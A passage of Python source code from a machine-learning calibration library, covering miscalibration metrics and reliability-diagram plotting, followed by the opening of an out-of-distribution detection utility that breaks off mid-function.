return miscalibration, bin_map, acc_hist, conf_hist, variance_hist, samples_map
def _prepare_bins(self, X: List[np.ndarray], num_features: int) -> List[List[np.ndarray]]:
""" Prepare number of bins for binning scheme. """
# check bins parameter
# is int? distribute to all dimensions
if isinstance(self.bins, int):
bins = [self.bins, ] * num_features
# is iterable? check for compatibility with all properties found
elif isinstance(self.bins, (tuple, list)):
if len(self.bins) != num_features:
raise AttributeError("Length of \'bins\' parameter must match number of features.")
else:
bins = self.bins
else:
raise AttributeError("Unknown type of parameter \'bins\'.")
# create an own set of bin boundaries for each batch in X
        bin_bounds = [[np.linspace(0.0, 1.0, n_bin + 1) for n_bin in bins] for _ in X]
# on equal_intervals=True, simply use linspace
# if the goal is to equalize the amount of samples in each bin, use np.quantile
if not self.equal_intervals:
for i, (batch_X, bounds) in enumerate(zip(X, bin_bounds)):
for dim, b in enumerate(bounds):
quantile = np.quantile(batch_X[:, dim], q=b, axis=0)
# set lower and upper bounds to confidence limits
quantile[0] = 0.
quantile[-1] = 1.
bin_bounds[i][dim] = quantile
return bin_bounds
def _prepare_input(self, X: np.ndarray, y: np.ndarray) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
""" Prepare structure of input data (number of dimensions, etc.) """
# remove unnecessary dims if given
y = self.squeeze_generic(y, axes_to_keep=0)
# after processing uncertainty, we expect batch_X to be only 2-D afterwards (but probably with more samples)
# if we had no uncertainty, we expect that anyway
assert X.ndim <= 2, "Fatal error: invalid number of dimensions."
assert y.size > 0, "No samples provided."
assert X.shape[0] == y.shape[0], "Unequal number of samples given in X and y."
# on detection mode, we only have binary samples
if (y.ndim > 1 or (np.unique(y) > 1).any()) and self.detection:
raise ValueError("On detection, only binary values for y are valid.")
# on detection mode, leave y array untouched
elif len(y.shape) == 2 and not self.detection:
# still assume y as binary with ground truth labels present in y=1 entry
if y.shape[1] <= 2:
y = y[:, -1]
# assume y as one-hot encoded
else:
y = np.argmax(y, axis=1)
# clip to (0, 1) in order to get all samples into binning scheme
X = np.clip(X, self.epsilon, 1. - self.epsilon)
# -------------------------------------------------
# now evaluate the accuracy/precision
# on detection mode or binary classification, the accuracy/precision is already given in y
if self.detection or len(np.unique(y)) <= 2:
matched = np.array(y)
# on multiclass classification, we need to evaluate the accuracy by the predictions in X
else:
matched = np.argmax(X, axis=1) == y
X = np.max(X, axis=1, keepdims=True)
return X, y, matched
def _prepare_uncertainty(self, X: np.ndarray, y: np.ndarray, uncertainty: str) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
""" Prepare input data for uncertainty handling. """
# -------------------------------------------------
# process uncertainty mode first
if uncertainty is None:
if X.ndim == 3:
print("Input data is 3D but uncertainty type not specified. Using \'mean\'.")
                # set the uncertainty type here; this branch is executed at most once
uncertainty = 'mean'
else:
return X, y, np.zeros_like(X)
# on uncertainty mode, there might be two reasons why there are only 2 dimensions:
# first case: no additional uncertainty support, only observation and feature/multiclass dimension given
        # second case: no additional features/multiclass probs, only realization and observation dimensions are given
if X.ndim == 2:
# identify axis that holds the observation dimension
obs_dim = [shape == y.shape[-1] for shape in X.shape].index(True)
# first case: no probability/realization axis - prepend dimension
# this is equivalent to no uncertainty
if obs_dim == 0:
X = np.expand_dims(X, axis=0)
# second case: no feature/multiclass prob axis - append axis
elif obs_dim == 1:
X = np.expand_dims(X, axis=2)
else:
raise ValueError("Input data is incosistent for uncertainty mode.")
# process the different types of uncertainty
# first one: MC integration with additional uncertainty per sample
if uncertainty in ['mean', 'median', 'mode']:
# first condition: check for invalid detection mode
# second condition: check for invalid binary classification mode
# third condition: check for invalid multiclass classification mode
if (y.ndim == 2 and self.detection) or \
(y.ndim == 2 and X.ndim == 2 and not self.detection) or \
(y.ndim == 3 and X.ndim == 3 and not self.detection):
raise ValueError("Separate ground-truth information is provided for each probability forward pass "
"but uncertainty type \'mean\', \'median\' or \'mode\' is specified.")
if uncertainty == 'mean':
X, X_uncertainty = self._mean(X)
elif uncertainty == 'median':
X, X_uncertainty = self._median(X)
elif uncertainty == 'mode':
X, X_uncertainty = self._mode(X)
else:
raise AttributeError("Fatal implementation error.")
# second one: treat each parameter set separately
# however, we can not assess the uncertainty of a single sample in this case
elif uncertainty == 'flatten':
X, y = self._flatten(X, y)
X_uncertainty = np.zeros_like(X)
else:
raise NotImplementedError("Uncertainty type \'%s\' is not implemented." % uncertainty)
return X, y, X_uncertainty
def _flatten(self, X: np.ndarray, y: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
""" repeat features to flattened confidence estimates """
# multiclass classification
if X.ndim == 3 and not self.detection:
n_classes = X.shape[1]
# if y is 3-D on multiclass classification, we also have separate ground-truth information available
# then simply flatten
if y.ndim == 3:
y = np.reshape(y, (-1, y.shape[2]))
else:
y = np.tile(y, X.shape[0])
# use NumPy's reshape function to flatten array along first axis
X = np.reshape(X, (-1, n_classes))
# binary classification
else:
n_features = X.shape[2]
# if y is 2-D on binary classification or detection, we also
# have separate ground-truth information available
# then simply flatten
if y.ndim == 2:
y = y.flatten()
else:
y = np.tile(y, X.shape[0])
# use NumPy's reshape function to flatten array along first axis
X = np.reshape(X, (-1, n_features))
return X, y
def _mean(self, X: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
""" return mean of input data along first axis """
return np.mean(X, axis=0), np.var(X, axis=0)
def _median(self, X: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
""" return median of input data along first axis """
return np.median(X, axis=0), np.var(X, axis=0)
def _mode(self, X: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
""" return mode of input data along first axis """
ret = []
# credible interval bounds on confidence only
for feature in range(X.shape[-1]):
bounds = hpdi(X[..., feature], 0.05)
mode = np.sum(bounds, axis=1) / 2.
ret.append(mode)
return np.stack(ret, axis=1), np.var(X, axis=0)
def _measure(self, X: Union[Iterable[np.ndarray], np.ndarray], y: Union[Iterable[np.ndarray], np.ndarray],
metric: str, batched: bool = False, uncertainty: str = None,
return_map: bool = False,
return_num_samples: bool = False,
return_uncertainty_map: bool = False) -> Union[float, Tuple]:
"""
Measure calibration by given predictions with confidence and the according ground truth.
Assume binary predictions with y=1.
Parameters
----------
X : iterable of np.ndarray, or np.ndarray of shape=([n_bayes], n_samples, [n_classes/n_box_features])
NumPy array with confidence values for each prediction on classification with shapes
1-D for binary classification, 2-D for multi class (softmax).
            If 3-D, interpret first dimension as samples from a Bayesian estimator with multiple data points
for a single sample (e.g. variational inference or MC dropout samples).
If this is an iterable over multiple instances of np.ndarray and parameter batched=True,
interpret this parameter as multiple predictions that should be averaged.
On detection, this array must have 2 dimensions with number of additional box features in last dim.
y : iterable of np.ndarray with same length as X or np.ndarray of shape=([n_bayes], n_samples, [n_classes])
NumPy array with ground truth labels.
Either as label vector (1-D) or as one-hot encoded ground truth array (2-D).
            If 3-D, interpret first dimension as samples from a Bayesian estimator with multiple data points
for a single sample (e.g. variational inference or MC dropout samples).
If iterable over multiple instances of np.ndarray and parameter batched=True,
interpret this parameter as multiple predictions that should be averaged.
batched : bool, optional, default: False
Multiple predictions can be evaluated at once (e.g. cross-validation examinations) using batched-mode.
All predictions given by X and y are separately evaluated and their results are averaged afterwards
for visualization.
        uncertainty : str, optional, default: None
Define uncertainty handling if input X has been sampled e.g. by Monte-Carlo dropout or similar methods
that output an ensemble of predictions per sample. Choose one of the following options:
            - flatten: treat everything as a separate prediction - this option will yield a slightly better
calibration performance but without the visualization of a prediction interval.
- mean: compute Monte-Carlo integration to obtain a simple confidence estimate for a sample
(mean) with a standard deviation that is visualized.
metric : str
Determine metric to measure. Must be one of 'ACE', 'ECE' or 'MCE'.
return_map: bool, optional, default: False
If True, return map with miscalibration metric separated into all remaining dimension bins.
return_num_samples : bool, optional, default: False
If True, also return the number of samples in each bin.
return_uncertainty_map : bool, optional, default: False
If True, also return the average deviation of the confidence within each bin.
Returns
-------
float or tuple of (float, np.ndarray, [np.ndarray, [np.ndarray]])
Always returns miscalibration metric.
If 'return_map' is True, return tuple and append miscalibration map over all bins.
If 'return_num_samples' is True, return tuple and append the number of samples in each bin (excluding confidence dimension).
            If 'return_uncertainty_map' is True, return tuple and append the average standard deviation of confidence within each bin (excluding confidence dimension).
"""
# check if metric is correct set
if not isinstance(metric, str):
raise AttributeError('Parameter \'metric\' must be string \'ACE\', \'ECE\' or \'MCE\'.')
if not metric.lower() in ['ace', 'ece', 'mce']:
raise AttributeError('Parameter \'metric\' must be string \'ACE\', \'ECE\' or \'MCE\'.')
else:
metric = metric.lower()
# prepare input data
X, matched, sample_uncertainty, bin_bounds, _ = self.prepare(X, y, batched, uncertainty)
# iterate over all batches of X and matched and calculate average miscalibration
results = []
for batch_X, batch_matched, batch_uncertainty, bounds in zip(X, matched, sample_uncertainty, bin_bounds):
# perform binning on input arrays and drop last outcome (idx bin indices are not needed here)
histograms = self.binning(bounds, batch_X, batch_matched, batch_X[:, 0], batch_uncertainty[:, 0])
histograms = histograms[:-1]
result = self.process(metric, *histograms)
results.append(result)
# finally, average over all batches
miscalibration = np.mean([result[0] for result in results], axis=0)
bin_map = np.mean([result[1] for result in results], axis=0)
samples_map = np.mean([result[-1] for result in results], axis=0)
uncertainty_map = np.sqrt(np.mean([result[-2] for result in results], axis=0))
# build output structure w.r.t. user input
if return_map or return_num_samples or return_uncertainty_map:
return_value = (float(miscalibration),)
if return_map:
return_value = return_value + (bin_map,)
if return_num_samples:
return_value = return_value + (samples_map,)
if return_uncertainty_map:
return_value = return_value + (uncertainty_map,)
return return_value
else:
return float(miscalibration)
class ReliabilityDiagram(object):
"""
Plot Confidence Histogram and Reliability Diagram to visualize miscalibration.
On classification, plot the gaps between average confidence and observed accuracy bin-wise over the confidence
space [1]_, [2]_.
On detection, plot the miscalibration w.r.t. the additional regression information provided (1-D or 2-D) [3]_.
Parameters
----------
bins : int or iterable, default: 10
Number of bins used by the ACE/ECE/MCE.
On detection mode: if int, use same amount of bins for each dimension (nx1 = nx2 = ... = bins).
If iterable, use different amount of bins for each dimension (nx1, nx2, ... = bins).
equal_intervals : bool, optional, default: True
        If True, the bins have the same width. If False, the bins are split to equalize
the number of samples in each bin.
detection : bool, default: False
If False, the input array 'X' is treated as multi-class confidence input (softmax)
with shape (n_samples, [n_classes]).
        If True, the input array 'X' is treated as box predictions with several box features (at least
box confidence must be present) with shape (n_samples, [n_box_features]).
fmin : float, optional, default: None
Minimum value for scale color.
fmax : float, optional, default: None
Maximum value for scale color.
metric : str, default: 'ECE'
Metric to measure miscalibration. Might be either 'ECE', 'ACE' or 'MCE'.
References
----------
.. [1] Chuan Guo, Geoff Pleiss, Yu Sun and Kilian Q. Weinberger:
"On Calibration of Modern Neural Networks."
Proceedings of the 34th International Conference on Machine Learning-Volume 70. JMLR. org, 2017.
`Get source online <https://arxiv.org/abs/1706.04599>`_
.. [2] A. Niculescu-Mizil and R. Caruana:
“Predicting good probabilities with supervised learning.”
Proceedings of the 22nd International Conference on Machine Learning, 2005, pp. 625–632.
`Get source online <https://www.cs.cornell.edu/~alexn/papers/calibration.icml05.crc.rev3.pdf>`_
.. [3] Fabian Küppers, Jan Kronenberger, Amirhossein Shantia and Anselm Haselhoff:
"Multivariate Confidence Calibration for Object Detection."
The IEEE Conference on Computer Vision and Pattern Recognition (CVPR) Workshops, 2020.
`Get source online <https://openaccess.thecvf.com/content_CVPRW_2020/papers/w20/Kuppers_Multivariate_Confidence_Calibration_for_Object_Detection_CVPRW_2020_paper.pdf>`_
"""
def __init__(self, bins: Union[int, Iterable[int]] = 10, equal_intervals: bool = True,
detection: bool = False, sample_threshold: int = 1,
fmin: float = None, fmax: float = None,
metric: str = 'ECE', style: str = "curve", **kwargs):
""" Constructor. For detailed parameter documentation view classdocs. """
assert style in ["curve", "bar"]
self.bins = bins
self.detection = detection
self.sample_threshold = sample_threshold
self.fmin = fmin
self.fmax = fmax
self.metric = metric
self.style = style
if 'feature_names' in kwargs:
self.feature_names = kwargs['feature_names']
if 'title_suffix' in kwargs:
self.title_suffix = kwargs['title_suffix']
self._miscalibration = _Miscalibration(bins=bins, equal_intervals=equal_intervals,
detection=detection, sample_threshold=sample_threshold)
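    # Illustrative usage sketch (hypothetical, not from the original module):
    #     diagram = ReliabilityDiagram(bins=15, style="curve")
    #     fig_rel, fig_hist = diagram.plot(confidences, labels, title_suffix="test")
    # where `confidences` is an (n_samples, n_classes) softmax array and `labels` is the
    # matching 1-D ground-truth vector; with confidences only, plot() returns the
    # reliability figure and the confidence histogram figure.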
def plot(self, X: Union[Iterable[np.ndarray], np.ndarray], y: Union[Iterable[np.ndarray], np.ndarray],
batched: bool = False, uncertainty: str = None, filename: str = None, tikz: bool = False,
title_suffix: str = None, feature_names: List[str] = None, **save_args) -> Union[plt.Figure, str]:
"""
Reliability diagram to visualize miscalibration. This could be either in classical way for confidences only
or w.r.t. additional properties (like x/y-coordinates of detection boxes, width, height, etc.). The additional
properties get binned. Afterwards, the miscalibration will be calculated for each bin. This is
        visualized as 2-D plots.
Parameters
----------
X : iterable of np.ndarray, or np.ndarray of shape=([n_bayes], n_samples, [n_classes/n_box_features])
NumPy array with confidence values for each prediction on classification with shapes
1-D for binary classification, 2-D for multi class (softmax).
            If 3-D, interpret first dimension as samples from a Bayesian estimator with multiple data points
for a single sample (e.g. variational inference or MC dropout samples).
If this is an iterable over multiple instances of np.ndarray and parameter batched=True,
interpret this parameter as multiple predictions that should be averaged.
On detection, this array must have 2 dimensions with number of additional box features in last dim.
y : iterable of np.ndarray with same length as X or np.ndarray of shape=([n_bayes], n_samples, [n_classes])
NumPy array with ground truth labels.
Either as label vector (1-D) or as one-hot encoded ground truth array (2-D).
            If 3-D, interpret first dimension as samples from a Bayesian estimator with multiple data points
for a single sample (e.g. variational inference or MC dropout samples).
If iterable over multiple instances of np.ndarray and parameter batched=True,
interpret this parameter as multiple predictions that should be averaged.
batched : bool, optional, default: False
Multiple predictions can be evaluated at once (e.g. cross-validation examinations) using batched-mode.
All predictions given by X and y are separately evaluated and their results are averaged afterwards
for visualization.
        uncertainty : str, optional, default: None
Define uncertainty handling if input X has been sampled e.g. by Monte-Carlo dropout or similar methods
that output an ensemble of predictions per sample. Choose one of the following options:
            - flatten: treat everything as a separate prediction - this option will yield a slightly better
calibration performance but without the visualization of a prediction interval.
- mean: compute Monte-Carlo integration to obtain a simple confidence estimate for a sample
(mean) with a standard deviation that is visualized.
filename : str, optional, default: None
Optional filename to save the plotted figure.
tikz : bool, optional, default: False
If True, use 'tikzplotlib' package to return tikz-code for Latex rather than a Matplotlib figure.
title_suffix : str, optional, default: None
Suffix for plot title.
feature_names : list, optional, default: None
Names of the additional features that are attached to the axes of a reliability diagram.
**save_args : args
Additional arguments passed to 'matplotlib.pyplot.Figure.savefig' function if 'tikz' is False.
If 'tikz' is True, the argument are passed to 'tikzplotlib.get_tikz_code' function.
Returns
-------
matplotlib.pyplot.Figure if 'tikz' is False else str with tikz code.
Raises
------
AttributeError
- If parameter metric is not string or string is not 'ACE', 'ECE' or 'MCE'
- If parameter 'feature_names' is set but length does not fit to second dim of X
- If no ground truth samples are provided
- If length of bins parameter does not match the number of features given by X
- If more than 3 feature dimensions (including confidence) are provided
"""
# assign deprecated constructor parameter to title_suffix and feature_names
if hasattr(self, 'title_suffix') and title_suffix is None:
title_suffix = self.title_suffix
if hasattr(self, 'feature_names') and feature_names is None:
feature_names = self.feature_names
# check if metric is correct
if not isinstance(self.metric, str):
raise AttributeError('Parameter \'metric\' must be string with either \'ece\', \'ace\' or \'mce\'.')
# check metrics parameter
if self.metric.lower() not in ['ece', 'ace', 'mce']:
raise AttributeError('Parameter \'metric\' must be string with either \'ece\', \'ace\' or \'mce\'.')
else:
self.metric = self.metric.lower()
# perform checks and prepare input data
X, matched, sample_uncertainty, bin_bounds, num_features = self._miscalibration.prepare(X, y, batched, uncertainty)
if num_features > 3:
raise AttributeError("Diagram is not defined for more than 2 additional feature dimensions.")
histograms = []
for batch_X, batch_matched, batch_uncertainty, bounds in zip(X, matched, sample_uncertainty, bin_bounds):
batch_histograms = self._miscalibration.binning(bounds, batch_X, batch_matched, batch_X[:, 0], batch_uncertainty[:, 0])
histograms.append(batch_histograms[:-1])
# no additional dimensions? compute standard reliability diagram
if num_features == 1:
fig1, fig2 = self.__plot_confidence_histogram(X, matched, histograms, bin_bounds, title_suffix)
return fig1, fig2
# one additional feature? compute 1D-plot
elif num_features == 2:
fig = self.__plot_1d(histograms, bin_bounds, title_suffix, feature_names)
# two additional features? compute 2D plot
elif num_features == 3:
fig = self.__plot_2d(histograms, bin_bounds, title_suffix, feature_names)
# number of dimensions exceeds 3? quit
else:
raise AttributeError("Diagram is not defined for more than 2 additional feature dimensions.")
# if tikz is true, create tikz code from matplotlib figure
        if tikz:
            # the module-level tikzplotlib import is commented out above, so import it
            # lazily here; the dependency is only needed when tikz output is requested
            import tikzplotlib
            # get tikz code for our specific figure and also pass filename to store possible bitmaps
            tikz_fig = tikzplotlib.get_tikz_code(fig, filepath=filename, **save_args)
# close matplotlib figure when tikz figure is requested to save memory
plt.close(fig)
fig = tikz_fig
# save figure either as matplotlib PNG or as tikz output file
if filename is not None:
if tikz:
with open(filename, "w") as open_file:
open_file.write(fig)
else:
fig.savefig(filename, **save_args)
return fig
@classmethod
def __interpolate_grid(cls, metric_map: np.ndarray) -> np.ndarray:
""" Interpolate missing values in a 2D-grid using the mean of the data. The interpolation is done inplace. """
# get all NaNs
nans = np.isnan(metric_map)
x = lambda z: z.nonzero()
# get mean of the remaining values and interpolate missing by the mean
mean = float(np.mean(metric_map[~nans]))
metric_map[nans] = griddata(x(~nans), metric_map[~nans], x(nans), method='cubic', fill_value=mean)
return metric_map
def __plot_confidence_histogram(self, X: List[np.ndarray], matched: List[np.ndarray], histograms: List[np.ndarray],
bin_bounds: List, title_suffix: str = None) -> plt.Figure:
""" Plot confidence histogram and reliability diagram to visualize miscalibration for condidences only. """
# get number of bins (self.bins has not been processed yet)
n_bins = len(bin_bounds[0][0])-1
median_confidence = [(bounds[0][1:] + bounds[0][:-1]) * 0.5 for bounds in bin_bounds]
mean_acc, mean_conf = [], []
for batch_X, batch_matched, batch_hist, batch_median in zip(X, matched, histograms, median_confidence):
acc_hist, conf_hist, _, num_samples_hist = batch_hist
empty_bins, = np.nonzero(num_samples_hist == 0)
# calculate overall mean accuracy and confidence
mean_acc.append(np.mean(batch_matched))
mean_conf.append(np.mean(batch_X))
# set empty bins to median bin value
acc_hist[empty_bins] = batch_median[empty_bins]
conf_hist[empty_bins] = batch_median[empty_bins]
# convert num_samples to relative afterwards (inplace denoted by [:])
num_samples_hist[:] = num_samples_hist / np.sum(num_samples_hist)
# import ipdb; ipdb.set_trace()
# get mean histograms and values over all batches
acc = np.mean([hist[0] for hist in histograms], axis=0)
conf = np.mean([hist[1] for hist in histograms], axis=0)
uncertainty = np.sqrt(np.mean([hist[2] for hist in histograms], axis=0))
num_samples = np.mean([hist[3] for hist in histograms], axis=0)
mean_acc = np.mean(mean_acc)
mean_conf = np.mean(mean_conf)
median_confidence = np.mean(median_confidence, axis=0)
bar_width = np.mean([np.diff(bounds[0]) for bounds in bin_bounds], axis=0)
# compute credible interval of uncertainty
p = 0.05
z_score = norm.ppf(1. - (p / 2))
uncertainty = z_score * uncertainty
# if no uncertainty is given, set variable uncertainty to None in order to prevent drawing error bars
if np.count_nonzero(uncertainty) == 0:
uncertainty = None
# calculate deviation
deviation = conf - acc
fig1 = plt.figure("Reliability {}".format(title_suffix))
ax = fig1.add_subplot()
# set title suffix if given
# if title_suffix is not None:
# ax.set_title('Reliability Diagram' + " - " + title_suffix)
# else:
# ax.set_title('Reliability Diagram')
# create two overlaying bar charts with bin accuracy and the gap of each bin to the perfect calibration
if self.style == "bar":
# ax.bar(median_confidence, height=median_confidence, width=bar_width, align='center',
# edgecolor='black', color='pink', alpha=0.6)
ax.bar(median_confidence, height=acc, width=bar_width, align='center',
edgecolor='black', yerr=uncertainty, capsize=2)
# ax.bar(median_confidence, height=deviation, bottom=acc, width=bar_width, align='center',
# edgecolor='black', color='red', alpha=0.6)
else:
ax.plot(median_confidence, acc, color="blue", linestyle="-")
# draw diagonal as perfect calibration line
ax.plot([0, 1], [0, 1], color='red', linestyle='-.')
# ax.set_xlim((0.0, 1.0))
# ax.set_ylim((0.0, 1.0))
# labels and legend of second plot
# ax.set_xlabel('Confidence')
# ax.set_ylabel('Accuracy')
ax.legend(['Output', 'Expected'], fontsize=14)
fig2 = plt.figure("Conf. Hist.")
ax = fig2.add_subplot()
ax.bar(median_confidence, height=num_samples, width=bar_width, align='center', edgecolor='black')
ax.plot([mean_acc, mean_acc], [0.0, 1.0], color='red', linestyle='--')
ax.plot([mean_conf, mean_conf], [0.0, 1.0], color='blue', linestyle='--')
ax.set_xlim((0.0, 1.0))
ax.set_ylim((0.0, 1.0))
plt.tight_layout()
return fig1, fig2
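        # NOTE: everything below this unconditional return is unreachable; it appears to be
        # the earlier combined two-panel (confidence histogram + reliability diagram) variant
        # of this method, kept in place in the original source.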
# -----------------------------------------
# plot data distribution histogram first
fig, axes = plt.subplots(2, squeeze=True, figsize=(7, 6))
ax = axes[0]
        # set title suffix if given
if title_suffix is not None:
ax.set_title('Confidence Histogram - ' + title_suffix)
else:
ax.set_title('Confidence Histogram')
# create bar chart with relative amount of samples in each bin
# as well as average confidence and accuracy
ax.bar(median_confidence, height=num_samples, width=bar_width, align='center', edgecolor='black')
ax.plot([mean_acc, mean_acc], [0.0, 1.0], color='black', linestyle='--')
ax.plot([mean_conf, mean_conf], [0.0, 1.0], color='gray', linestyle='--')
ax.set_xlim((0.0, 1.0))
ax.set_ylim((0.0, 1.0))
# labels and legend
ax.set_xlabel('Confidence')
ax.set_ylabel('% of Samples')
ax.legend(['Avg. Accuracy', 'Avg. Confidence', 'Relative Amount of Samples'])
# second plot: reliability histogram
ax = axes[1]
# set title suffix if given
if title_suffix is not None:
ax.set_title('Reliability Diagram' + " - " + title_suffix)
else:
ax.set_title('Reliability Diagram')
# create two overlaying bar charts with bin accuracy and the gap of each bin to the perfect calibration
ax.bar(median_confidence, height=acc, width=bar_width, align='center',
edgecolor='black', yerr=uncertainty, capsize=4)
ax.bar(median_confidence, height=deviation, bottom=acc, width=bar_width, align='center',
edgecolor='black', color='red', alpha=0.6)
# draw diagonal as perfect calibration line
ax.plot([0, 1], [0, 1], color='red', linestyle='--')
ax.set_xlim((0.0, 1.0))
ax.set_ylim((0.0, 1.0))
# labels and legend of second plot
ax.set_xlabel('Confidence')
ax.set_ylabel('Accuracy')
ax.legend(['Perfect Calibration', 'Output', 'Gap'])
plt.tight_layout()
return fig
def __plot_1d(self, histograms: List[np.ndarray], bin_bounds: List,
title_suffix: str = None, feature_names: List[str] = None) -> plt.Figure:
""" Plot 1-D miscalibration w.r.t. one additional feature. """
# z score for credible interval (if uncertainty is given)
p = 0.05
z_score = norm.ppf(1. - (p / 2))
results = []
for batch_hist, bounds in zip(histograms, bin_bounds):
result = self._miscalibration.process(self.metric, *batch_hist)
bin_median = (bounds[-1][:-1] + bounds[-1][1:]) * 0.5
# interpolate missing values
x = np.linspace(0.0, 1.0, 1000)
miscalibration = interp1d(bin_median, result[1], kind='cubic', fill_value='extrapolate')(x)
acc = interp1d(bin_median, result[2], kind='cubic', fill_value='extrapolate')(x)
conf = interp1d(bin_median, result[3], kind='cubic', fill_value='extrapolate')(x)
uncertainty = interp1d(bin_median, result[4], kind='cubic', fill_value='extrapolate')(x)
results.append((miscalibration, acc, conf, uncertainty))
# get mean over all batches and convert mean variance to a std deviation afterwards
miscalibration = np.mean([result[0] for result in results], axis=0)
acc = np.mean([result[1] for result in results], axis=0)
conf = np.mean([result[2] for result in results], axis=0)
uncertainty = np.sqrt(np.mean([result[3] for result in results], axis=0))
# draw routines
fig, ax1 = plt.subplots()
conf_color = 'tab:blue'
# set name of the additional feature
if feature_names is not None:
ax1.set_xlabel(feature_names[0])
ax1.set_xlim([0.0, 1.0])
ax1.set_ylim([0.0, 1.0])
ax1.set_ylabel('accuracy/confidence', color=conf_color)
# draw confidence and accuracy on the same (left) axis
x = np.linspace(0.0, 1.0, 1000)
line1, = ax1.plot(x, acc, '-.', color='black')
line2, = ax1.plot(x, conf, '--', color=conf_color)
ax1.tick_params('y', labelcolor=conf_color)
# if uncertainty is given, compute average of variances over all bins and get std deviation by sqrt
# compute credible interval afterwards
# define lower and upper bound
uncertainty = z_score * uncertainty
lb = conf - uncertainty
ub = conf + uncertainty
# create second axis for miscalibration
ax11 = ax1.twinx()
miscal_color = 'tab:red'
line3, = ax11.plot(x, miscalibration, '-', color=miscal_color)
if self.metric == 'ace':
ax11.set_ylabel('Average Calibration Error (ACE)', color=miscal_color)
elif self.metric == 'ece':
ax11.set_ylabel('Expected Calibration Error (ECE)', color=miscal_color)
elif self.metric == 'mce':
ax11.set_ylabel('Maximum Calibration Error (MCE)', color=miscal_color)
ax11.tick_params('y', labelcolor=miscal_color)
# set miscalibration limits if given
if self.fmin is not None and self.fmax is not None:
ax11.set_ylim([self.fmin, self.fmax])
ax1.legend((line1, line2, line3),
('accuracy', 'confidence', '%s' % self.metric.upper()),
loc='best')
if title_suffix is not None:
ax1.set_title('Accuracy, confidence and %s\n- %s -' % (self.metric.upper(), title_suffix))
else:
ax1.set_title('Accuracy, confidence and %s' % self.metric.upper())
ax1.grid(True)
fig.tight_layout()
return fig
def __plot_2d(self, histograms: List[np.ndarray], bin_bounds: List[np.ndarray],
title_suffix: str = None, feature_names: List[str] = None) -> plt.Figure:
""" Plot 2D miscalibration reliability diagram heatmap. """
results = []
for batch_hist in histograms:
result = self._miscalibration.process(self.metric, *batch_hist)
# interpolate 2D data inplace to avoid "empty" bins
batch_samples = result[-1]
for map in result[1:-1]:
map[batch_samples == 0.0] = 0.0
# TODO: check what to do here
# map[batch_samples == 0.0] = np.nan
# self.__interpolate_grid(map)
# on interpolation, it is sometimes possible that empty bins have negative values
# however, this is invalid for variance
result[4][result[4] < 0] = 0.0
results.append(result)
# calculate mean over all batches and transpose
# transpose is necessary. Miscalibration is calculated in the order given by the features
# however, imshow expects arrays in format [rows, columns] or [height, width]
# e.g., miscalibration with additional x/y (in this order) will be drawn [y, x] otherwise
miscalibration = np.mean([result[1] for result in results], axis=0).T
acc = np.mean([result[2] for result in results], axis=0).T
conf = np.mean([result[3] for result in results], axis=0).T
mean = np.mean([result[4] for result in results], axis=0).T
uncertainty = np.sqrt(mean)
# -----------------------------------------------------------------------------------------
# draw routines
def set_axis(ax, map, vmin=None, vmax=None):
""" Generic function to set all subplots equally """
# TODO: set proper fmin, fmax values
img = ax.imshow(map, origin='lower', interpolation="gaussian", cmap='jet', aspect=1, vmin=vmin, vmax=vmax)
# set correct x- and y-ticks
ax.set_xticks(np.linspace(0., len(bin_bounds[0][1])-2, 5))
ax.set_xticklabels(np.linspace(0., 1., 5))
ax.set_yticks(np.linspace(0., len(bin_bounds[0][2])-2, 5))
ax.set_yticklabels(np.linspace(0., 1., 5))
ax.set_xlim([0.0, len(bin_bounds[0][1])-2])
ax.set_ylim([0.0, len(bin_bounds[0][2])-2])
# draw feature names on axes if given
if feature_names is not None:
ax.set_xlabel(feature_names[0])
ax.set_ylabel(feature_names[1])
fig.colorbar(img, ax=ax, fraction=0.046, pad=0.04)
return ax, img
# -----------------------------------
# create only two subplots if no additional uncertainty is given
if np.count_nonzero(uncertainty) == 0:
fig, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(15, 5))
# process additional uncertainty if given
else:
fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, squeeze=True, figsize=(10, 10))
ax4, img4 = set_axis(ax4, uncertainty)
if title_suffix is not None:
ax4.set_title("Confidence std deviation\n- %s -" % title_suffix)
else:
ax4.set_title("Confidence std deviation")
ax1, img1 = set_axis(ax1, acc, vmin=0, vmax=1)
ax2, img2 = set_axis(ax2, conf, vmin=0, vmax=1)
ax3, img3 = set_axis(ax3, miscalibration, vmin=self.fmin, vmax=self.fmax)
# draw title if given
if title_suffix is not None:
ax1.set_title("Average accuracy\n- %s -" % title_suffix)
ax2.set_title("Average confidence\n- %s -" % title_suffix)
ax3.set_title("%s\n- %s -" % (self.metric.upper(), title_suffix))
else:
ax1.set_title("Average accuracy")
ax2.set_title("Average confidence")
ax3.set_title("%s" % self.metric.upper())
# -----------------------------------------------------------------------------------------
return fig | 58,000 | Python | .py | 974 | 48.472279 | 175 | 0.621711 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,893 | ood_test_utils.py | cvlab-yonsei_RankMixup/calibrate/evaluation/ood_test_utils.py | # Utility functions to get OOD detection ROC curves and AUROC scores
# Ideally should be agnostic of model architectures
import torch
import torch.nn.functional as F
from sklearn import metrics
def entropy(net_output):
p = F.softmax(net_output, dim=1)
logp = F.log_softmax(net_output, dim=1)
plogp = p * logp
entropy = - torch.sum(plogp, dim=1)
return entropy
def confidence(net_output):
p = F.softmax(net_output, dim=1)
confidence, _ = torch.max(p, dim=1)
return confidence
def get_roc_auc(net, test_loader, ood_test_loader, device):
    """Score in-distribution and OOD samples with entropy and max-softmax confidence,
    returning (binary label, score) pairs for both detection criteria."""
bin_labels_entropies = None
bin_labels_confidences = None
entropies = None
confidences = None
net.eval()
with torch.no_grad():
# Getting entropies for in-distribution data
for i, (data, label) in enumerate(test_loader):
data = data.to(device)
label = label.to(device)
bin_label_entropy = torch.zeros(label.shape).to(device)
bin_label_confidence = torch.ones(label.shape).to(device)
net_output = net(data)
entrop = entropy(net_output)
conf = confidence(net_output)
if (i == 0):
bin_labels_entropies = bin_label_entropy
bin_labels_confidences = bin_label_confidence
entropies = entrop
confidences = conf
else:
